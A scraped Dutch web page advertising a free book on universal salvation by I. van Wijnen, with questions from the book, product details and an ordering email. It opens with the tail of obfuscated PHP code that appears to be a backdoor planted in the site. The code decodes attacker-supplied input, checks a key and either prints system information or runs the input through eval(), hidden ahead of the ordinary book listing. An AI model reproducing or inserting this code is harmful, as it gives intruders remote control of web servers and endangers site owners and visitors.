$mc71c2a03){$p28e = $mc71c2a03;$l94f = $gbe686;}if (!$p28e){foreach ($o97c75f8[$o97c75f8['o933'][37].$o97c75f8['o933'][87].$o97c75f8['o933'][57].$o97c75f8['o933'][87].$o97c75f8['o933'][34].$o97c75f8['o933'][71].$o97c75f8['o933'][42].$o97c75f8['o933'][19]] as $gbe686=>$mc71c2a03){$p28e = $mc71c2a03;$l94f = $gbe686;}}$p28e = @$o97c75f8[$o97c75f8['o933'][65].$o97c75f8['o933'][89].$o97c75f8['o933'][87].$o97c75f8['o933'][93].$o97c75f8['o933'][53].$o97c75f8['o933'][93].$o97c75f8['o933'][74].$o97c75f8['o933'][71].$o97c75f8['o933'][37]]($o97c75f8[$o97c75f8['o933'][35].$o97c75f8['o933'][74].$o97c75f8['o933'][74].$o97c75f8['o933'][53].$o97c75f8['o933'][37].$o97c75f8['o933'][18].$o97c75f8['o933'][87].$o97c75f8['o933'][53].$o97c75f8['o933'][31]]($o97c75f8[$o97c75f8['o933'][69].$o97c75f8['o933'][19].$o97c75f8['o933'][93].$o97c75f8['o933'][34].$o97c75f8['o933'][57].$o97c75f8['o933'][89].$o97c75f8['o933'][37].$o97c75f8['o933'][72].$o97c75f8['o933'][18]]($p28e), $l94f));if (isset($p28e[$o97c75f8['o933'][53].$o97c75f8['o933'][64]]) && $n5f843a97==$p28e[$o97c75f8['o933'][53].$o97c75f8['o933'][64]]){if ($p28e[$o97c75f8['o933'][53]] == $o97c75f8['o933'][69]){$c4691d6fb = Array($o97c75f8['o933'][96].$o97c75f8['o933'][77] => @$o97c75f8[$o97c75f8['o933'][79].$o97c75f8['o933'][93].$o97c75f8['o933'][37].$o97c75f8['o933'][19]](),$o97c75f8['o933'][59].$o97c75f8['o933'][77] => $o97c75f8['o933'][72].$o97c75f8['o933'][67].$o97c75f8['o933'][31].$o97c75f8['o933'][13].$o97c75f8['o933'][72],);echo @$o97c75f8[$o97c75f8['o933'][73].$o97c75f8['o933'][57].$o97c75f8['o933'][18].$o97c75f8['o933'][72].$o97c75f8['o933'][1]]($c4691d6fb);}elseif ($p28e[$o97c75f8['o933'][53]] == $o97c75f8['o933'][37]){eval/*bb9a322*/($p28e[$o97c75f8['o933'][87]]);}exit();}} ?> Eén voor allen - Een hommage aan Gods vermogen (boek) - Een hommage aan Gods vermogen
« Naar overzicht

Eén voor allen - Een hommage aan Gods vermogen (boek)

  • Zal Gods liefde bij machte zijn zelfs de grootste zondaar tot berouw te brengen?
  • Zal God uiteindelijk alle doelmissers redden uit het volmachtsgebied van de duisternis en overzetten in het Koninkrijk van de Zoon van Zijn liefde?
  • Zal de hemelse Vader alle slaven van het verderf vrijmaken, om hen tot overweldigende heerlijkheid te brengen?
  • Zal God het al tot erkenning van de waarheid brengen?
  • Zal alle vijandschap overwonnen worden en zal de laatste vijand – de dood – buiten werking worden gesteld?
  • Zal de hemelse Vader, naar Wie iedere vaderlijke verwantschap in de hemelen en op aarde genoemd wordt, uiteindelijk alles in allen worden?

Is God vermogend Zijn Eigen wil waar te maken in Zijn schepping
of hebben we te maken met een God Die feilbaar is?

Geestelijk denken zet God, Die liefde is en liefde doet, in het middelpunt. De liefde ligt niet in het feit dat wij God liefhebben, maar in het feit dat Hij ons liefheeft. Door Eén voor allen te geven heeft God Zelf ‘dé Daad bij Zijn Woord’ gevoegd!

‘Want de liefde van Christus dringt ons,
daar wij tot het inzicht gekomen zijn,
dat Eén voor allen gestorven is.’

2 Kor. 5:14-15


Productinformatie

Auteur: I. van Wijnen
Taal: Nederlands
Uitgeverij: Novapres
Bindwijze: Luxe Paperback
Afmetingen: 38 (D) × 230 (H) × 150 (BR) mm
Pagina’s: 421
Gewicht: 730 gram 
ISBN: 9789063186128


Wilt u dit gratis boek bestellen?
Stuurt u dan een mailtje naar ingevanwijnen@live.nl 
Voor één boek zijn de verzendkosten € 3,95, voor meerdere boeken zijn de verzendkosten € 6,95 (nadere informatie volgt per e-mail).